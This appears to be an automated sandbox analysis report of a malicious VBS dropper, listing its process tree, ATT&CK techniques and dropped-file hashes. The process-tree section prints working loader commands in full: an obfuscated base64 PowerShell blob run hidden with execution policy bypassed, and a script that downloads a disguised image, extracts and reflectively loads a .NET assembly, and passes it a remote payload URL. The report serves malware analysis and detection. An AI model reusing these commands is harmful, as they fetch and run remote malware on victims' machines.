꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀e䷊ ꒠ ㎳ ⦱ ﯀B0䷊ ꒠ ㎳ ⦱ ﯀C4䷊ ꒠ ㎳ ⦱ ﯀UwB1䷊ ꒠ ㎳ ⦱ ﯀GI䷊ ꒠ ㎳ ⦱ ﯀cwB0䷊ ꒠ ㎳ ⦱ ﯀HI䷊ ꒠ ㎳ ⦱ ﯀aQBu䷊ ꒠ ㎳ ⦱ ﯀Gc䷊ ꒠ ㎳ ⦱ ﯀K䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀k䷊ ꒠ ㎳ ⦱ ﯀HM䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀Bh䷊ ꒠ ㎳ ⦱ ﯀HI䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀BJ䷊ ꒠ ㎳ ⦱ ﯀G4䷊ ꒠ ㎳ ⦱ ﯀Z䷊ ꒠ ㎳ ⦱ ﯀Bl䷊ ꒠ ㎳ ⦱ ﯀Hg䷊ ꒠ ㎳ ⦱ ﯀L䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀g䷊ ꒠ ㎳ ⦱ ﯀CQ䷊ ꒠ ㎳ ⦱ ﯀YgBh䷊ ꒠ ㎳ ⦱ ﯀HM䷊ ꒠ ㎳ ⦱ ﯀ZQ䷊ ꒠ ㎳ ⦱ ﯀2䷊ ꒠ ㎳ ⦱ ﯀DQ䷊ ꒠ ㎳ ⦱ ﯀T䷊ ꒠ ㎳ ⦱ ﯀Bl䷊ ꒠ ㎳ ⦱ ﯀G4䷊ ꒠ ㎳ ⦱ ﯀ZwB0䷊ ꒠ ㎳ ⦱ ﯀Gg䷊ ꒠ ㎳ ⦱ ﯀KQ䷊ ꒠ ㎳ ⦱ ﯀7䷊ ꒠ ㎳ ⦱ ﯀CQ䷊ ꒠ ㎳ ⦱ ﯀YwBv䷊ ꒠ ㎳ ⦱ ﯀G0䷊ ꒠ ㎳ ⦱ ﯀bQBh䷊ ꒠ ㎳ ⦱ ﯀G4䷊ ꒠ ㎳ ⦱ ﯀Z䷊ ꒠ ㎳ ⦱ ﯀BC䷊ ꒠ ㎳ ⦱ ﯀Hk䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀Bl䷊ ꒠ ㎳ ⦱ ﯀HM䷊ ꒠ ㎳ ⦱ ﯀I䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀9䷊ ꒠ ㎳ ⦱ ﯀C䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀WwBT䷊ ꒠ ㎳ ⦱ ﯀Hk䷊ ꒠ ㎳ ⦱ ﯀cwB0䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀bQ䷊ ꒠ ㎳ ⦱ ﯀u䷊ ꒠ ㎳ ⦱ ﯀EM䷊ ꒠ ㎳ ⦱ ﯀bwBu䷊ ꒠ ㎳ ⦱ ﯀HY䷊ ꒠ ㎳ ⦱ ﯀ZQBy䷊ ꒠ ㎳ ⦱ ﯀HQ䷊ ꒠ ㎳ ⦱ ﯀XQ䷊ ꒠ ㎳ ⦱ ﯀6䷊ ꒠ ㎳ ⦱ ﯀Do䷊ ꒠ ㎳ ⦱ ﯀RgBy䷊ ꒠ ㎳ ⦱ ﯀G8䷊ ꒠ ㎳ ⦱ ﯀bQBC䷊ ꒠ ㎳ ⦱ ﯀GE䷊ ꒠ ㎳ ⦱ ﯀cwBl䷊ ꒠ ㎳ ⦱ ﯀DY䷊ ꒠ ㎳ ⦱ ﯀N䷊ ꒠ ㎳ ⦱ ﯀BT䷊ ꒠ ㎳ ⦱ ﯀HQ䷊ ꒠ ㎳ ⦱ ﯀cgBp䷊ ꒠ ㎳ ⦱ ﯀G4䷊ ꒠ ㎳ ⦱ ﯀Zw䷊ ꒠ ㎳ ⦱ ﯀o䷊ ꒠ ㎳ ⦱ ﯀CQ䷊ ꒠ ㎳ ⦱ ﯀YgBh䷊ ꒠ ㎳ ⦱ ﯀HM䷊ ꒠ ㎳ ⦱ ﯀ZQ䷊ ꒠ ㎳ ⦱ ﯀2䷊ ꒠ ㎳ ⦱ ﯀DQ䷊ ꒠ ㎳ ⦱ ﯀QwBv䷊ ꒠ ㎳ ⦱ ﯀G0䷊ ꒠ ㎳ ⦱ ﯀bQBh䷊ ꒠ ㎳ ⦱ ﯀G4䷊ ꒠ ㎳ ⦱ ﯀Z䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀p䷊ ꒠ ㎳ ⦱ ﯀Ds䷊ ꒠ ㎳ ⦱ ﯀J䷊ ꒠ ㎳ ⦱ ﯀Bs䷊ ꒠ ㎳ ⦱ ﯀G8䷊ ꒠ ㎳ ⦱ ﯀YQBk䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀Z䷊ ꒠ ㎳ ⦱ ﯀BB䷊ ꒠ ㎳ ⦱ ﯀HM䷊ ꒠ ㎳ ⦱ ﯀cwBl䷊ ꒠ ㎳ ⦱ ﯀G0䷊ ꒠ ㎳ ⦱ ﯀YgBs䷊ ꒠ ㎳ ⦱ ﯀Hk䷊ ꒠ ㎳ ⦱ ﯀I䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀9䷊ ꒠ ㎳ ⦱ ﯀C䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀WwBT䷊ ꒠ ㎳ ⦱ ﯀Hk䷊ ꒠ ㎳ ⦱ ﯀cwB0䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀bQ䷊ ꒠ ㎳ ⦱ ﯀u䷊ ꒠ ㎳ ⦱ ﯀FI䷊ ꒠ ㎳ ⦱ ﯀ZQBm䷊ ꒠ ㎳ ⦱ ﯀Gw䷊ ꒠ ㎳ ⦱ ﯀ZQBj䷊ ꒠ ㎳ ⦱ ﯀HQ䷊ ꒠ ㎳ ⦱ ﯀aQBv䷊ ꒠ ㎳ ⦱ ﯀G4䷊ ꒠ ㎳ ⦱ ﯀LgBB䷊ ꒠ ㎳ ⦱ ﯀HM䷊ ꒠ ㎳ ⦱ ﯀cwBl䷊ ꒠ ㎳ ⦱ ﯀G0䷊ ꒠ ㎳ ⦱ ﯀YgBs䷊ ꒠ ㎳ ⦱ ﯀Hk䷊ ꒠ ㎳ ⦱ ﯀XQ䷊ ꒠ ㎳ ⦱ ﯀6䷊ ꒠ ㎳ ⦱ ﯀Do䷊ ꒠ ㎳ ⦱ ﯀T䷊ ꒠ ㎳ ⦱ ﯀Bv䷊ ꒠ ㎳ ⦱ ﯀GE䷊ ꒠ ㎳ ⦱ ﯀Z䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀o䷊ ꒠ ㎳ ⦱ ﯀CQ䷊ ꒠ ㎳ ⦱ ﯀YwBv䷊ ꒠ ㎳ ⦱ ﯀G0䷊ ꒠ ㎳ ⦱ ﯀bQBh䷊ ꒠ ㎳ ⦱ ﯀G4䷊ ꒠ ㎳ ⦱ ﯀Z䷊ ꒠ ㎳ ⦱ ﯀BC䷊ ꒠ ㎳ ⦱ ﯀Hk䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀Bl䷊ ꒠ ㎳ ⦱ ﯀HM䷊ ꒠ ㎳ ⦱ ﯀KQ䷊ ꒠ ㎳ ⦱ ﯀7䷊ ꒠ ㎳ ⦱ ﯀CQ䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀B5䷊ ꒠ ㎳ ⦱ ﯀H䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀ZQ䷊ ꒠ ㎳ ⦱ ﯀g䷊ ꒠ ㎳ ⦱ ﯀D0䷊ ꒠ ㎳ ⦱ ﯀I䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀k䷊ ꒠ ㎳ ⦱ ﯀Gw䷊ ꒠ ㎳ ⦱ ﯀bwBh䷊ ꒠ ㎳ ⦱ ﯀GQ䷊ ꒠ ㎳ ⦱ ﯀ZQBk䷊ ꒠ ㎳ ⦱ ﯀EE䷊ ꒠ ㎳ ⦱ ﯀cwBz䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀bQBi䷊ ꒠ ㎳ ⦱ ﯀Gw䷊ ꒠ ㎳ ⦱ ﯀eQ䷊ ꒠ ㎳ ⦱ ﯀u䷊ ꒠ ㎳ ⦱ ﯀Ec䷊ ꒠ ㎳ ⦱ ﯀ZQB0䷊ ꒠ ㎳ ⦱ ﯀FQ䷊ ꒠ ㎳ ⦱ ﯀eQBw䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀K䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀n䷊ ꒠ ㎳ ⦱ ﯀GQ䷊ ꒠ ㎳ ⦱ ﯀bgBs䷊ ꒠ ㎳ ⦱ ﯀Gk䷊ ꒠ ㎳ ⦱ ﯀Yg䷊ ꒠ ㎳ ⦱ ﯀u䷊ ꒠ ㎳ ⦱ ﯀Ek䷊ ꒠ ㎳ ⦱ ﯀Tw䷊ ꒠ ㎳ ⦱ ﯀u䷊ ꒠ ㎳ ⦱ ﯀Eg䷊ ꒠ ㎳ ⦱ ﯀bwBt䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀Jw䷊ ꒠ ㎳ ⦱ ﯀p䷊ ꒠ ㎳ ⦱ ﯀Ds䷊ ꒠ ㎳ ⦱ ﯀J䷊ ꒠ ㎳ ⦱ ﯀Bt䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀Bo䷊ ꒠ ㎳ ⦱ ﯀G8䷊ ꒠ ㎳ ⦱ ﯀Z䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀g䷊ ꒠ ㎳ ⦱ ﯀D0䷊ ꒠ ㎳ ⦱ ﯀I䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀k䷊ ꒠ ㎳ ⦱ ﯀HQ䷊ ꒠ ㎳ ⦱ ﯀eQBw䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀LgBH䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀BN䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀Bo䷊ ꒠ ㎳ ⦱ ﯀G8䷊ ꒠ ㎳ ⦱ ﯀Z䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀o䷊ ꒠ ㎳ ⦱ ﯀Cc䷊ ꒠ ㎳ ⦱ ﯀VgBB䷊ ꒠ ㎳ ⦱ ﯀Ek䷊ ꒠ ㎳ ⦱ ﯀Jw䷊ ꒠ ㎳ ⦱ ﯀p䷊ ꒠ ㎳ ⦱ ﯀C4䷊ ꒠ ㎳ ⦱ ﯀SQBu䷊ ꒠ ㎳ ⦱ ﯀HY䷊ ꒠ ㎳ ⦱ ﯀bwBr䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀K䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀k䷊ ꒠ ㎳ ⦱ ﯀G4䷊ ꒠ ㎳ ⦱ ﯀dQBs䷊ ꒠ ㎳ ⦱ ﯀Gw䷊ ꒠ ㎳ ⦱ ﯀L䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀g䷊ ꒠ ㎳ ⦱ ﯀Fs䷊ ꒠ ㎳ ⦱ ﯀bwBi䷊ ꒠ ㎳ ⦱ ﯀Go䷊ ꒠ ㎳ ⦱ ﯀ZQBj䷊ ꒠ ㎳ ⦱ ﯀HQ䷊ ꒠ ㎳ ⦱ ﯀WwBd䷊ ꒠ ㎳ ⦱ ﯀F0䷊ ꒠ ㎳ ⦱ ﯀I䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀o䷊ ꒠ ㎳ ⦱ ﯀Cc䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀B4䷊ ꒠ ㎳ ⦱ ﯀HQ䷊ ꒠ ㎳ ⦱ ﯀Lg䷊ ꒠ ㎳ ⦱ ﯀0䷊ ꒠ ㎳ ⦱ ﯀DQ䷊ ꒠ ㎳ ⦱ ﯀N䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀2䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀cwBh䷊ ꒠ ㎳ ⦱ ﯀GI䷊ ꒠ ㎳ ⦱ ﯀ZQBy䷊ ꒠ ㎳ ⦱ ﯀Gk䷊ ꒠ ㎳ ⦱ ﯀ZgBs䷊ ꒠ ㎳ ⦱ ﯀G8䷊ ꒠ ㎳ ⦱ ﯀cgB0䷊ ꒠ ㎳ ⦱ ﯀G4䷊ ꒠ ㎳ ⦱ ﯀bwBj䷊ ꒠ ㎳ ⦱ ﯀C8䷊ ꒠ ㎳ ⦱ ﯀Mg䷊ ꒠ ㎳ ⦱ ﯀0䷊ ꒠ ㎳ ⦱ ﯀DE䷊ ꒠ ㎳ ⦱ ﯀Lg䷊ ꒠ ㎳ ⦱ ﯀2䷊ ꒠ ㎳ ⦱ ﯀DE䷊ ꒠ ㎳ ⦱ ﯀Mg䷊ ꒠ ㎳ ⦱ ﯀u䷊ ꒠ ㎳ ⦱ ﯀DM䷊ ꒠ ㎳ ⦱ ﯀Lg䷊ ꒠ ㎳ ⦱ ﯀y䷊ ꒠ ㎳ ⦱ ﯀Dk䷊ ꒠ ㎳ ⦱ ﯀MQ䷊ ꒠ ㎳ ⦱ ﯀v䷊ ꒠ ㎳ ⦱ ﯀C8䷊ ꒠ ㎳ ⦱ ﯀OgBw䷊ ꒠ ㎳ ⦱ ﯀HQ䷊ ꒠ ㎳ ⦱ ﯀d䷊ ꒠ ㎳ ⦱ ﯀Bo䷊ ꒠ ㎳ ⦱ ﯀Cc䷊ ꒠ ㎳ ⦱ ﯀I䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀s䷊ ꒠ ㎳ ⦱ ﯀C䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀JwBk䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀cwBh䷊ ꒠ ㎳ ⦱ ﯀HQ䷊ ꒠ ㎳ ⦱ ﯀aQB2䷊ ꒠ ㎳ ⦱ ﯀GE䷊ ꒠ ㎳ ⦱ ﯀Z䷊ ꒠ ㎳ ⦱ ﯀Bv䷊ ꒠ ㎳ ⦱ ﯀Cc䷊ ꒠ ㎳ ⦱ ﯀I䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀s䷊ ꒠ ㎳ ⦱ ﯀C䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀JwBk䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀cwBh䷊ ꒠ ㎳ ⦱ ﯀HQ䷊ ꒠ ㎳ ⦱ ﯀aQB2䷊ ꒠ ㎳ ⦱ ﯀GE䷊ ꒠ ㎳ ⦱ ﯀Z䷊ ꒠ ㎳ ⦱ ﯀Bv䷊ ꒠ ㎳ ⦱ ﯀Cc䷊ ꒠ ㎳ ⦱ ﯀I䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀s䷊ ꒠ ㎳ ⦱ ﯀C䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀JwBk䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀cwBh䷊ ꒠ ㎳ ⦱ ﯀HQ䷊ ꒠ ㎳ ⦱ ﯀aQB2䷊ ꒠ ㎳ ⦱ ﯀GE䷊ ꒠ ㎳ ⦱ ﯀Z䷊ ꒠ ㎳ ⦱ ﯀Bv䷊ ꒠ ㎳ ⦱ ﯀Cc䷊ ꒠ ㎳ ⦱ ﯀L䷊ ꒠ ㎳ ⦱ ﯀䷊ ꒠ ㎳ ⦱ ﯀n䷊ ꒠ ㎳ ⦱ ﯀EE䷊ ꒠ ㎳ ⦱ ﯀Z䷊ ꒠ ㎳ ⦱ ﯀Bk䷊ ꒠ ㎳ ⦱ ﯀Ek䷊ ꒠ ㎳ ⦱ ﯀bgBQ䷊ ꒠ ㎳ ⦱ ﯀HI䷊ ꒠ ㎳ ⦱ ﯀bwBj䷊ ꒠ ㎳ ⦱ ﯀GU䷊ ꒠ ㎳ ⦱ ﯀cwBz䷊ ꒠ ㎳ ⦱ ﯀DM䷊ ꒠ ㎳ ⦱ ﯀Mg䷊ ꒠ ㎳ ⦱ ﯀n䷊ ꒠ ㎳ ⦱ ﯀Cw䷊ ꒠ ㎳ ⦱ ﯀Jw䷊ ꒠ ㎳ ⦱ ﯀n䷊ ꒠ ㎳ ⦱ ﯀Ck䷊ ꒠ ㎳ ⦱ ﯀KQ䷊ ꒠ ㎳ ⦱ ﯀=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('䷊ ꒠ ㎳ ⦱ ﯀','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2772
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.4446esaberiflortnoc/241.612.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
9e00e7b13c64affd6e3965a224718d12

SHA1
12eff5b3d9c1f7979f993e3e7fd1e20878ce1354

SHA256
dff00f229061ab233e4d8d365a45809d47ef8535f9dcaf2a1ef429be168e75e0

SHA512
b9e7aefde2df023dba018e35390c3a84b78bc435e3c46c3d0516386932744cdf983b7887950da2b945a3f05b05e984fdbed0964f53447b82f92e40cfabfee05e

Download Submit
C:\Users\Admin\AppData\Roaming\controfireftpfridayequitosdatinglover.vbs

Filesize
111KB

MD5
dcf0d8a05c45980bd5bfc7184ea4c7e4

SHA1
8e449e46e68293350214e7f2489a4264aa0e3445

SHA256
054aecc061c7860a8afde955344eb4350f5e0242ff630b01eff53c902f8ca05e

SHA512
c52cae8d0306a28dd503f523d49168eb9ad04eff53947023b623124a43ca3639b7efc36d731228ff2554dd2d4fcc2010703b47f486a2a00b95ca83ef95ca1055

Download Submit
memory/2548-1-0x0000000072DAD000-0x0000000072DB8000-memory.dmp

Filesize
44KB

Download
memory/2548-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2548-16-0x0000000072DAD000-0x0000000072DB8000-memory.dmp

Filesize
44KB

Download
memory/2548-18-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2548-19-0x0000000072DAD000-0x0000000072DB8000-memory.dmp

Filesize
44KB

Download

Analysis

Sharing